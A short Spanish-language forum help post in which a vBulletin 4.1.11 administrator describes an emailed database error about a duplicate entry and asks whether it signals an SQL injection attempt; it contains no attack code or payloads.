[Ayuda] Intento de Injeccion SQL o que?

Buenas, tengo un problema, he recibido por correo un error que hago suponer que es de vBulletin, aunque no encuentro como solucionarlo..
Lo que yo hago a entender es que por algún motivo se intentó duplicar una entrada en la DB, y nose si el error de SQL en realidad es un intento de injección SQL.

Actualmente tengo la versión vBulletin 4.1.11
Espero que alguien pueda ayudarme
